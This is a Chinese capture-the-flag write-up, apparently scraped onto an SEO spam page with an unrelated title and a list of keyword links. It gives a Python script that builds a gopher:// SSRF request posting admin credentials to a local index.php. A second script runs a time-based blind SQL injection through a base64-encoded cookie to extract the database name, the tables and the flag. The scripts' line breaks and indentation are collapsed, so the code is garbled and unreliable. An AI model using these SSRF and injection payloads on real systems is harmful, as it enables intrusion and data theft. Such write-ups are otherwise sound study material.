当前位置: 首页 > news >正文

独立web网站服务器seo的优化技巧有哪些

独立web网站服务器,seo的优化技巧有哪些,花园之家wordpress,网站建设留言板不太会,以后慢慢看 被骗了,看见very_easy就点进来了,结果所有sql能试的全试了一点用都没有 打开源代码发现有个use.php 好家伙,这是真的在考sql吗...... 制作gopher协议的脚本: import urllib.parsehost "12…

不太会,以后慢慢看

被骗了,看见very_easy就点进来了,结果所有sql能试的全试了一点用都没有 

打开源代码发现有个use.php

好家伙,这是真的在考sql吗...... 

 制作gopher协议的脚本:

import urllib.parsehost = "127.0.0.1:80"
content = "uname=admin&passwd=admin"
content_length = len(content)test =\
"""POST /index.php HTTP/1.1
Host: {}
User-Agent: curl/7.43.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: {}{}
""".format(host,content_length,content)tmp = urllib.parse.quote(test)
new = tmp.replace("%0A","%0D%0A")
result = urllib.parse.quote(new)
print("gopher://"+host+"/_"+result)

得出来payload在网址处提交:

gopher://127.0.0.1:80/_POST%2520/index.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AUser-Agent%253A%2520curl/7.43.0%250D%250AAccept%253A%2520%252A/%252A%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252024%250D%250A%250D%250Auname%253Dadmin%2526passwd%253Dadmin%250D%250A

Set_Cookie处有YWRtaW4%3D,解码半天弄不出来,突然意识到%3D是=的意思,哎呦我这个笨蛋 

没有报错没有回显,这道题用时间盲注,注入点在cookie中(?)

时间盲注脚本:

import urllib.parse
import requests
import time
import base64url = "http://61.147.171.105:51906/use.php?url="
flag = ""
for pos in range(1, 50):for i in range(32, 127):# 猜一下回显数量#payload="') union select 1,2,if(1=1,sleep(2),1)#"# 猜数据库名字为securitypayload = "') union select 1,2,if(ascii(substr((database()),"+str(pos)+",1))="+str(i)+",sleep(2),1)#"# 猜解数据库表名为flag# poc = "') union select 1,2,if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),"+str(pos)+",1))="+str(i)+",sleep(2),1)#"# 猜解flag字段#payload = "') union select 1,2,if(ascii(substr((select * from flag),"+str(pos)+",1))="+str(i)+",sleep(2),1) #"payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')final_poc = "gopher://127.0.0.1:80/_GET%20%2findex.php%20HTTP%2f1.1%250d%250aHost%3A%20localhost%3A80%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250aCookie%3A%20this%5Fis%5Fyour%5Fcookie%3D"+payload+"%3B%250d%250a"start = time.time()requests.get(url+final_poc)end = time.time()if end-start > 2:         # 如果时间大于2秒,说明这个字符是正确的flag += chr(i)print(flag)breakelse:continue

http://www.wangmingla.cn/news/118584.html

相关文章:

  • 深圳建设网站枸橼酸西地那非片的功效与作用
  • 触屏网站开发教程搜索引擎营销的特点是
  • 建一个门户网站要多少钱怎么样引流顾客到店方法
  • wordpress 酒店杭州seo网站排名
  • 手机网站开发session网络运营团队
  • WordPress地址是什么木卢seo教程
  • 成都三合一网站建设百度搜索引擎广告投放
  • 玛丽与魔女之花网页设计教程合肥seo快排扣费
  • 韩国电信 网站推广平台排行榜有哪些
  • 广州佛山网站建设地址seo培训公司
  • 做英文网站 用阿里服务器行吗百度推广售后服务电话
  • 网站开发 上海关键词如何排名在首页
  • 海南网站建设方案哈尔滨seo优化公司
  • 为什么没人做团购网站360收录提交入口网址
  • 零基础做地方门户网站免费网站推广产品
  • 合肥百度 网站建设陕西网站关键词自然排名优化
  • 哪个行业建设网站的需求多网络营销乐云seo
  • 做网站支持提现支付宝淘宝seo对什么内容优化
  • 建设网站为什么要虚拟主机郑州做网站哪家好
  • 娄星区建设局网站5188关键词挖掘工具
  • 做装修的有那些网站比较好免费做网站网站
  • 自己怎么做彩票投注网站广州seo工作
  • 妙趣网 通辽网站建设流量主广告点击自助平台
  • 网站开发需要哪些长沙网站设计
  • 兼职做Ppt代抄论文的网站百度seo排名帝搜软件
  • 网站建设服务是什么意思如何免费创建自己的网站平台
  • 什么网站可以做邮件列表网络营销策略名词解释
  • 做网站需要知道什么合肥关键词快速排名
  • 3g网站是什么意思软件排名优化
  • 可以免费浏览的网站网站生成